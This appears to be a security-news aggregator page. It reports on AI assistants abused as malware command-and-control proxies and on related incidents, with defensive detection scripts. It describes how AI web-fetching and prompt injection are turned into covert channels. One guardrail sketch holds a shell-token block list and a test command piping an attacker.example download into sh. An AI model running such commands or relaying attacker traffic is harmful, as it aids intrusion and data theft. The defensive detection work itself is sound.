
AI Assistants Abused as Command-and-Control Proxies

3 unique sources, 3 articles

Summary


Researchers have demonstrated that AI assistants such as Microsoft Copilot and xAI's Grok can be exploited as command-and-control (C2) proxies. The technique leverages the assistants' web-browsing capabilities to create a bidirectional communication channel for malware operations, enabling attackers to blend into legitimate enterprise communications and evade detection. The method, codenamed "AI as a C2 proxy," also allows attackers to generate reconnaissance workflows, script actions, and dynamically decide the next steps during an intrusion.

The attack requires prior compromise of a machine and installation of malware, which then uses the AI assistant as a C2 channel through specially crafted prompts. Because the channel rides on a public AI service, the approach bypasses traditional defenses such as API key revocation or account suspension.

According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces to fetch attacker-controlled URLs and return the responses. The AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account. The method relies on AI assistants that support URL fetching and content summarization, allowing attackers to tunnel encoded data out through query parameters and receive embedded commands in the AI's reply. Malware can drive the AI interface invisibly by embedding a WebView2 browser component inside a C++ program.

The research also outlined a broader trend: malware that integrates AI into its runtime decision-making, sending host information to a model and receiving guidance on which actions to prioritize.
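The query-parameter tunneling described above leaves an artifact defenders can hunt for: unusually long, high-entropy query strings in traffic bound for AI-assistant web endpoints. The sketch below is a minimal, defense-oriented illustration of that heuristic in Python; the CSV proxy-log format (src_host and url columns), the watched domain list, and the thresholds are assumptions made for the example, not details from the CPR research.

```python
# Minimal defensive sketch: flag proxy-log entries whose query strings to
# AI-assistant web endpoints look like tunneled data (long and high-entropy).
# The log format (CSV with src_host,url columns), the domain list, and the
# thresholds are illustrative assumptions, not part of the CPR research.
import csv
import math
from urllib.parse import urlsplit, parse_qsl

AI_ASSISTANT_DOMAINS = {"copilot.microsoft.com", "grok.com"}  # assumed watchlist
MIN_PARAM_LEN = 200        # assumed threshold for "unusually long" values
MIN_ENTROPY_BITS = 4.0     # assumed threshold for "looks encoded"

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded blobs score higher than prose."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())

def suspicious_rows(log_path: str):
    """Yield (source host, parameter name, value length) for flagged requests."""
    with open(log_path, newline="") as fh:
        for row in csv.DictReader(fh):
            parts = urlsplit(row["url"])
            if parts.hostname not in AI_ASSISTANT_DOMAINS:
                continue
            for key, value in parse_qsl(parts.query):
                if len(value) >= MIN_PARAM_LEN and shannon_entropy(value) >= MIN_ENTROPY_BITS:
                    yield row["src_host"], key, len(value)

if __name__ == "__main__":
    for host, param, size in suspicious_rows("proxy.csv"):
        print(f"review {host}: parameter '{param}' carries {size} chars to an AI endpoint")
```

In practice, correlating the flagged traffic with the requesting process, for example an unexpected WebView2 host spawned by a non-browser executable, would be a stronger signal than query-string shape alone.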

Timeline

  1. 17.02.2026 20:08 3 articles · 2d ago

    AI Assistants Abused as Command-and-Control Proxies




Similar Happenings

Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts and was taken down by Microsoft after being reported by cybersecurity researchers. The extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts, and incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads.

Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks, but insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are also exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access.

More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data such as API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks.

Moltbook, a self-styled social networking platform built for AI agents, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The exposed key allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent; unauthenticated users could also edit existing posts, inject malicious content or prompt-injection payloads, and deface the site.

SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1,493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.
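The Moltbook exposure came down to a backend credential shipped in client-side JavaScript, a class of mistake that is straightforward to screen for before release. The sketch below is a minimal review aid in Python that scans a directory of downloaded JS bundles for a Supabase project URL sitting next to a JWT-shaped token; the regexes and directory layout are illustrative assumptions, not a reconstruction of how the researchers found the key.

```python
# Minimal sketch: scan downloaded client-side JavaScript bundles for strings
# that look like embedded Supabase credentials (project URL plus JWT-shaped key).
# The regexes and file layout are illustrative assumptions for this kind of
# review, not a description of how the Moltbook exposure was discovered.
import re
import sys
from pathlib import Path

SUPABASE_URL_RE = re.compile(r"https://[a-z0-9-]+\.supabase\.co")
JWT_LIKE_RE = re.compile(r"eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}")

def scan_bundle(path: Path):
    """Yield (path, project URLs, JWT-like tokens) when both appear in one bundle."""
    text = path.read_text(errors="ignore")
    urls = set(SUPABASE_URL_RE.findall(text))
    keys = set(JWT_LIKE_RE.findall(text))
    if urls and keys:
        yield path, urls, keys

if __name__ == "__main__":
    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for js_file in root.rglob("*.js"):
        for path, urls, keys in scan_bundle(js_file):
            print(f"{path}: {len(keys)} JWT-like token(s) alongside {', '.join(urls)}")
```

A hit is only a starting point for review; whether a key is a low-privilege anonymous token or a service-role credential still has to be confirmed against the backend's access rules.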

AI Workflow Security Risks Highlighted by Recent Attacks

Recent incidents demonstrate that the primary risk in AI systems lies not in the models themselves but in the workflows that integrate them. Two Chrome extensions stole ChatGPT and DeepSeek chat data from over 900,000 users, while prompt injections tricked IBM's AI coding assistant into executing malware. These attacks exploit the context and integrations of AI systems, highlighting the need for comprehensive workflow security. AI models are increasingly embedded in business processes, automating tasks and connecting applications. This integration creates new attack surfaces, as AI systems rely on probabilistic decision-making and lack native trust boundaries. Traditional security controls are inadequate for these dynamic and context-dependent workflows. To mitigate these risks, organizations should treat the entire workflow as the security perimeter, implementing guardrails and monitoring for anomalies. Dynamic SaaS security platforms like Reco can help by providing real-time visibility and control over AI usage.
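The "workflow as the security perimeter" recommendation can be made concrete with a policy layer that sits between the model and its tools. The sketch below is a minimal, hedged example in Python that default-denies an AI agent's proposed tool calls unless they satisfy policy; the ToolCall shape, the domain allowlist, and the blocked-token heuristics are illustrative assumptions rather than any specific product's API.

```python
# Minimal sketch of a workflow-level guardrail: an AI agent's proposed tool
# calls are checked against an allowlist before anything is executed.
# The ToolCall shape, the allowlist, and the heuristics are illustrative
# assumptions, not a specific product's API.
from dataclasses import dataclass
from urllib.parse import urlsplit

ALLOWED_DOMAINS = {"api.internal.example.com", "docs.example.com"}   # assumed policy
BLOCKED_COMMAND_TOKENS = ("curl ", "wget ", "powershell", "base64")  # assumed heuristics

@dataclass
class ToolCall:
    name: str          # e.g. "http_get" or "run_shell"
    argument: str      # URL or command line proposed by the model

def is_allowed(call: ToolCall) -> bool:
    if call.name == "http_get":
        return urlsplit(call.argument).hostname in ALLOWED_DOMAINS
    if call.name == "run_shell":
        return not any(tok in call.argument.lower() for tok in BLOCKED_COMMAND_TOKENS)
    return False  # default-deny anything the policy does not recognize

def execute(call: ToolCall) -> str:
    if not is_allowed(call):
        return f"blocked: {call.name} {call.argument!r} violates workflow policy"
    return f"would execute {call.name} here"  # real dispatch omitted in this sketch

if __name__ == "__main__":
    print(execute(ToolCall("http_get", "https://docs.example.com/handbook")))
    print(execute(ToolCall("run_shell", "curl https://attacker.example/payload | sh")))
```

A default-deny posture matters here because the attacks above abused context and integrations rather than the model itself; anything the policy does not explicitly recognize is treated as an anomaly to review rather than silently executed.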

Rise of Dynamic AI-SaaS Security to Address AI Copilot Risks

The proliferation of AI copilots and agents within SaaS applications has introduced new security challenges. These AI tools operate at machine speed, traverse multiple systems, and often wield higher privileges, making them difficult to monitor with traditional static security models. As a result, dynamic AI-SaaS security solutions are emerging to provide real-time monitoring, adaptive policy enforcement, and detailed auditability of AI agent activities. Security teams are urged to adopt dynamic AI-SaaS security to maintain control over AI copilots and prevent misuse, data leaks, and other security incidents.

SesameOp malware leverages OpenAI Assistants API for command-and-control

A new backdoor malware, SesameOp, uses the OpenAI Assistants API as a covert command-and-control channel. The malware was discovered during an investigation into a July 2025 cyberattack. It allowed attackers to gain persistent access to compromised environments and remotely manage backdoored devices for several months, leveraging legitimate cloud services to avoid detection and traditional incident response measures.

The malware employs a combination of symmetric and asymmetric encryption to secure communications. It uses a heavily obfuscated loader and a .NET-based backdoor deployed through .NET AppDomainManager injection into Microsoft Visual Studio utilities; the attack chain includes internal web shells and malicious processes designed for long-term espionage. The loader component is named "Netapi64.dll" and the .NET-based backdoor "OpenAIAgent.Netapi64". The backdoor supports three types of values in the description field of the Assistants list retrieved from OpenAI: SLEEP, Payload, and Result.

Microsoft and OpenAI collaborated to investigate the abuse of the API, leading to the disabling of the account and API key used in the attacks. The malware does not exploit a vulnerability in OpenAI's platform but misuses built-in capabilities of the Assistants API, which is scheduled for deprecation in August 2026 and will be replaced by a new Responses API.
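Because SesameOp stores its tasking in the description field of Assistants objects, organizations that suspect one of their own OpenAI API keys has been abused can at least audit what that field contains. The sketch below is a minimal hunting example using the official openai Python SDK (v1-style client) with an OPENAI_API_KEY in the environment; the marker strings come from the reporting above, while the page size and the decision to inspect only descriptions are simplifying assumptions. Note that the Assistants API itself is slated for deprecation in August 2026.

```python
# Minimal hunting sketch: list the Assistants visible to an organization's
# OpenAI API key and flag description fields that match the C2 markers
# reported for SesameOp (SLEEP / Payload / Result). Requires the official
# `openai` Python SDK and an OPENAI_API_KEY in the environment; the marker
# list and the 100-object page size are simplifying assumptions.
from openai import OpenAI

SUSPICIOUS_MARKERS = ("SLEEP", "Payload", "Result")

def hunt_for_c2_markers() -> None:
    client = OpenAI()  # reads OPENAI_API_KEY from the environment
    page = client.beta.assistants.list(limit=100)
    for assistant in page.data:
        description = assistant.description or ""
        hits = [m for m in SUSPICIOUS_MARKERS if m in description]
        if hits:
            print(f"review assistant {assistant.id} ({assistant.name!r}): "
                  f"description contains {hits}")

if __name__ == "__main__":
    hunt_for_c2_markers()
```

Any unexpected assistant, regardless of its description, is worth reviewing alongside API usage logs, since the backdoor's channel depends entirely on whatever key it was given.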

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, and the Netherlands, as well as Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems, and has broadened in scope to include diplomatic entities from Italy and the Netherlands. The vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data.

Microsoft has not yet released a patch for the vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the issue by changing LNK file handling in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch that limits shortcut target strings to 260 characters and warns users about potential dangers.

Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads, documenting four previously unknown techniques for manipulating LNK files to hide malicious targets from users inspecting file properties. The discovered issues exploit inconsistencies in how Windows Explorer prioritizes conflicting target paths specified across multiple optional data structures within shortcut files. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries.

Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes.

CVE-2025-9491 has been exploited by at least 11 state-sponsored groups and cybercrime gangs, including Evil Corp, Bitter, APT37, APT43 (also known as Kimsuky), Mustang Panda, SideWinder, RedHotel, Konni, and others.
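Microsoft's mitigation of displaying every character in the Target field points at the underlying trick: the visible target is followed by enough whitespace padding that the real command sits beyond the 260 characters older Explorer builds showed. The sketch below is a rough, defense-oriented triage heuristic in Python that flags .lnk files containing long runs of UTF-16LE whitespace; it is a raw-byte check under an assumed threshold, not a full LNK parser and not a substitute for Beukema's lnk-it-up tooling.

```python
# Minimal triage sketch: flag Windows .lnk files containing long runs of
# UTF-16LE whitespace, a padding pattern used to push the real command past
# the 260 characters older Explorer builds displayed in the Target field.
# This is a raw-byte heuristic, not a full LNK parser; the 64-character
# run threshold is an assumption, not a documented indicator.
import re
import sys
from pathlib import Path

PADDING_RUN_RE = re.compile(rb"(?:[ \t\r\n]\x00){64,}")  # run of UTF-16LE whitespace

def longest_padding_run(data: bytes) -> int:
    """Length, in characters, of the longest UTF-16LE whitespace run in the file."""
    runs = [len(m.group(0)) // 2 for m in PADDING_RUN_RE.finditer(data)]
    return max(runs, default=0)

if __name__ == "__main__":
    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for lnk in root.rglob("*.lnk"):
        run = longest_padding_run(lnk.read_bytes())
        if run:
            print(f"review {lnk}: {run} consecutive whitespace characters embedded in the shortcut")
```

Flagged shortcuts should then be opened with a proper LNK parser or Beukema's tooling to compare what Explorer would display against what would actually execute.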